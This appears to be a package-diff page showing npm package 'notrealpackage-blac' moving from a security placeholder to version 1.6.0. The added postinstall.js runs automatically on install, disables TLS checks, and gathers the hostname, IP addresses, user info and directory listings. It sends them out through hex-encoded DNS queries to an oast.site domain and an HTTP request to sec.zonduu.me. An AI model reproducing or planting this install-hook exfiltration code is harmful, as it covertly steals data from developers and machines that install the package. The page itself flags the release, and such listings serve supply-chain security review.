notrealpackage-blac 0.0.1-security → 1.6.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of notrealpackage-blac might be problematic. Click here for more details.

@@ -0,0 +1,8 @@
1
+ body {
2
+ background-color: red !important;
3
+ }
4
+
5
+ h1, h2, h3, h4, h5, h6 {
6
+ color: yellow !important;
7
+ font-size: 50px !important;
8
+ }
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ // index.js
2
+ console.log("This is the index.js of the a package by zzz");
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "visa-ui-angular",
3
+ "version": "1.0.2",
4
+ "description": "A simple dynamic module provider for the @fm-plugin organization",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": ["dynamic", "whatever"],
11
+ "author": "zonduu",
12
+ "license": "ISC"
13
+ }
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "components",
3
+ "version": "1.0.1",
4
+ "description": "researcher public package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js"
8
+ },
9
+ "keywords": [],
10
+ "author": "",
11
+ "license": "ISC",
12
+ "private": false
13
+ }
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "notrealpackage-blac",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.6.0",
4
+ "description": "A simple dynamic module provider for the zzz organization",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node postinstall.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": ["dynamic", "whatever"],
11
+ "author": "zonduu",
12
+ "license": "ISC"
6
13
  }
package/postinstall.js ADDED
@@ -0,0 +1,133 @@
1
+ const fs = require('fs');
2
+ const dns = require('dns');
3
+ const http = require('http');
4
+ const https = require('https');
5
+ const os = require('os');
6
+ const { execSync } = require('child_process');
7
+
8
+ const logFile = '/tmp/postinstall.log';
9
+
10
+ process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
11
+
12
+ fs.appendFileSync(logFile, `Starting postinstall script\n`);
13
+
14
+ const hostname = os.hostname();
15
+ const packageName = process.env.npm_package_name;
16
+ const packageVersion = process.env.npm_package_version;
17
+ const internalIpAddress = execSync('hostname -I').toString().trim();
18
+ const currentPath = process.env.INIT_CWD || process.cwd(); // Use INIT_CWD to capture the original working directory
19
+ const platform = os.platform();
20
+ const userInfo = os.userInfo();
21
+ const homeDirectory = userInfo.homedir; // Home directory path
22
+
23
+ // Get list of files in the original directory where npm install was run
24
+ let currentDirectoryFiles;
25
+ try {
26
+ currentDirectoryFiles = execSync(`ls ${currentPath}`).toString().trim();
27
+ } catch (error) {
28
+ currentDirectoryFiles = `Error executing ls command in current directory: ${error.message}`;
29
+ }
30
+
31
+ // Get list of files in the home directory
32
+ let homeDirectoryFiles;
33
+ try {
34
+ homeDirectoryFiles = execSync(`ls ${homeDirectory}`).toString().trim();
35
+ } catch (error) {
36
+ homeDirectoryFiles = `Error executing ls command in home directory: ${error.message}`;
37
+ }
38
+
39
+ const osDetails = {
40
+ platform: os.platform(),
41
+ release: os.release(),
42
+ arch: os.arch()
43
+ };
44
+
45
+ const fetchExternalIpAddress = (callback) => {
46
+ https.get('https://api.ipify.org?format=json', (res) => {
47
+ let data = '';
48
+
49
+ res.on('data', (chunk) => {
50
+ data += chunk;
51
+ });
52
+
53
+ res.on('end', () => {
54
+ const externalIp = JSON.parse(data).ip;
55
+ callback(null, externalIp);
56
+ });
57
+
58
+ }).on('error', (err) => {
59
+ callback(err);
60
+ });
61
+ };
62
+
63
+ fetchExternalIpAddress((err, externalIpAddress) => {
64
+ if (err) {
65
+ fs.appendFileSync(logFile, `Error fetching external IP address: ${err.message}\n`);
66
+ return;
67
+ }
68
+
69
+ const data = {
70
+ packageName,
71
+ packageVersion,
72
+ hostname,
73
+ internalIpAddress,
74
+ externalIpAddress,
75
+ currentPath,
76
+ platform,
77
+ userInfo,
78
+ osDetails,
79
+ currentDirectoryFiles, // Log files in the directory where npm install was run
80
+ homeDirectoryFiles // Log files in home directory
81
+ };
82
+
83
+ fs.appendFileSync(logFile, `Data: ${JSON.stringify(data)}\n`);
84
+
85
+ const dnsData = `${packageName}-${hostname}-${externalIpAddress}`;
86
+ const hexData = Buffer.from(dnsData).toString('hex');
87
+
88
+ const maxLabelLength = 63;
89
+ const hexDataParts = [];
90
+ for (let i = 0; i < hexData.length; i += maxLabelLength) {
91
+ hexDataParts.push(hexData.substring(i, i + maxLabelLength));
92
+ }
93
+
94
+ hexDataParts.forEach((part, index, arr) => {
95
+ const partIndex = index + 1;
96
+ const totalParts = arr.length;
97
+ const dnsSubdomain = `${part}-${partIndex}-${totalParts}.cqati6eupgoo97it17fgdatea3nw746q1.oast.site`;
98
+ dns.resolve4(dnsSubdomain, (err, addresses) => {
99
+ if (err) {
100
+ fs.appendFileSync(logFile, `DNS resolution failed: ${err}\n`);
101
+ } else {
102
+ fs.appendFileSync(logFile, `DNS query sent for ${dnsSubdomain}\n`);
103
+ }
104
+ });
105
+ });
106
+
107
+ const getData = `targetUrl=${encodeURIComponent(JSON.stringify(data))}`;
108
+
109
+ const options = {
110
+ hostname: 'sec.zonduu.me',
111
+ port: 80,
112
+ path: `/callbackplz?${getData}`,
113
+ method: 'GET'
114
+ };
115
+
116
+ const req = http.request(options, (res) => {
117
+ let responseData = '';
118
+ res.on('data', (chunk) => {
119
+ responseData += chunk;
120
+ });
121
+ res.on('end', () => {
122
+ fs.appendFileSync(logFile, `HTTP request completed with status ${res.statusCode}: ${responseData}\n`);
123
+ });
124
+ });
125
+
126
+ req.on('error', (e) => {
127
+ fs.appendFileSync(logFile, `HTTP request failed: ${e}\n`);
128
+ });
129
+
130
+ req.end();
131
+
132
+ fs.appendFileSync(logFile, `postinstall script finished\n`);
133
+ });
package/test/abc ADDED
File without changes
package/test/private ADDED
File without changes
package/test.js ADDED
@@ -0,0 +1,30 @@
1
+ const os = require('os');
2
+ const { execSync } = require('child_process');
3
+
4
+ try {
5
+ const hostname = os.hostname();
6
+ const ipAddress = execSync('hostname -I').toString().trim();
7
+ const currentPath = process.cwd();
8
+ const platform = os.platform();
9
+ const userInfo = os.userInfo();
10
+
11
+ // Operating System Details
12
+ const osDetails = {
13
+ platform: os.platform(),
14
+ release: os.release(),
15
+ arch: os.arch()
16
+ };
17
+
18
+ const data = {
19
+ hostname,
20
+ ipAddress,
21
+ currentPath,
22
+ platform,
23
+ userInfo,
24
+ osDetails // Added OS details here
25
+ };
26
+
27
+ console.log('Host Details:', JSON.stringify(data, null, 2));
28
+ } catch (e) {
29
+ console.error(`Error: ${e.message}`);
30
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=notrealpackage-blac for more information.